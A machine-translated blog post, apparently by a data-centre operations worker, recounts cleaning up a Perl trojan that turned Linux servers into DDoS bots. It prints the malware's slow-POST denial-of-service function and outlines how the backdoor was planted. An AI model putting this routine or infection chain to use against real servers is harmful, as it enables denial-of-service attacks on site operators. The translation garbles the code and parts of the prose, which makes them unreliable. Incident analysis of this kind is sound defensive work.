One O & M, a Linux Trojan

In the last month, multiple servers in the data center were infected with Trojans, and customer websites were attacked by DDOS attacks. The company's O & M services were all in an exciting state, even my projects were stopped by the Department boss and called for O & M support. The first time I saw a trojan in Linux, I suddenly remembered it. It is worth record.
 

The analysis log shows that Attacker obtains the customer's background password in some way, and then uploads falabiya. cgi In the compressed package and runs it using the control panel vulnerability. This will generate the. X11-unix file (actually the falabiya section base64_decode),. X11-unix is the specific backdoor program.
 
Both Felix021 and senior mango of Xin 'an expressed interest in this case, so I analyzed it with them separately. This is a perl script that is well written. The specific function is to use our server as a zombie, listen to the port to obtain instructions, send data to the specified address, and thus implement DDOS attacks. The Code has a built-in UA string of almost all browsers. One of them is randomly extracted each time, disguised as normal access. Various DDOS methods such as genGarbage, tcp flood, udp flood, and slow get/post are implemented, especially the sendSlowPostRequest method, which is too cheap to be released a little bit, the other party must hold the resources and wait for you to finish sending them .. In just a few hundred lines of code, the exception handling for all kinds of errors is very careful, and it must come from the very beginning. There are some unidentifiable characters in the comment, and they do not know the encoding. They cannot be inferred which country the hacker wrote ..
 
Sub sendSlowPostRequest {
My $ host =$ _ [0];
My $ port =$ _ [1];
My $ path =$ _ [2];
My $ contentLen = $ _ [3];
My $ chars = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ! @ # $ % ^ & * () _ + | \ = -~ '2017 ";
 
Print "start \ n ";
 
Socket (SOCK, PF_INET, SOCK_STREAM, getprotobyname ('tcp '));
$ Iaddr = inet_aton ($ host );
$ Paddr = sockaddr_in ($ port, $ iaddr );
Connect (SOCK, $ paddr); www.2cto.com
 
# Send header
Send (SOCK, "POST". $ path. "HTTP/1.1 \ r \ n", 0 );
Send (SOCK, "Host: $ host \ r \ n", 0 );
Send (SOCK, "User-Agent: $ ua \ r \ n", 0 );
Send (SOCK, "Content-type: application/x-www-form-urlencoded \ r \ n", 0 );
Send (SOCK, "Content-length: $ contentLen \ r \ n", 0 );
Send (SOCK, "\ r \ n", 0 );
 
# Send body
For my $ I (1 .. $ contentLen ){
My $ symbol = substr $ chars, int rand length ($ chars), 1;
Print "$ symbol ";
Send (SOCK, $ symbol, 0 );
Sleep 3;
}
Send (SOCK, "\ r \ n", 0 );
Close (SOCK );
Print "end \ n ";
}
Later, we cleared all Trojans, restricted the running of scripts, and configured the firewall to prevent sending abnormal data. As for our own DDOS attacks, we also configured a firewall to handle them. The number of devices was several million, which was quite powerful. Because there are many attacks from China, Boss has always been very "admired" for Mainland hackers and asked me to introduce them to him .. In fact, I understand the so-called "hackers" in China, so I had to pull the LC from the Chinese Emy of Sciences after Wu Da Xin 'an graduated ...... Later, Boss ran to Beijing to talk about cooperation with lumeng. It is said that his family is about to go public.

The code must be pushed here.

Settled by the author